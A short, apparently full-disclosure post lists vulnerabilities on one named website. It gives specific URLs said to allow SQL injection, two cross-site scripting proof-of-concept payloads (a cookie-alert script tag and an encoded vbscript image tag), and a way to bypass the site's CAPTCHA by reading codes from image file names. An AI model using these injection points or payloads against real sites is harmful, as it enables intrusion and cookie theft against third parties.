Sql Injection www.pigrecotechnology.it/Archivio/goRicerca.asp?tipologia=tesi Sql injection and XSS http://www.pigrecotechnology.it/Search/contRicerca.asp in the search form "><script>alert(document.cookie);</script><" XSS http://www.pigrecotechnology.it/riservata.asp?messaggio=%3CIMG%20SRC=%27vbscript:msgbox%28%22hello%22%29%27%3E useless CAPTCHA http://www.pigrecotechnology.it/riservata.asp You can get the captcha code (numbers) from the name of the images. It can be easily avoided by a very simple bot. It's just useless.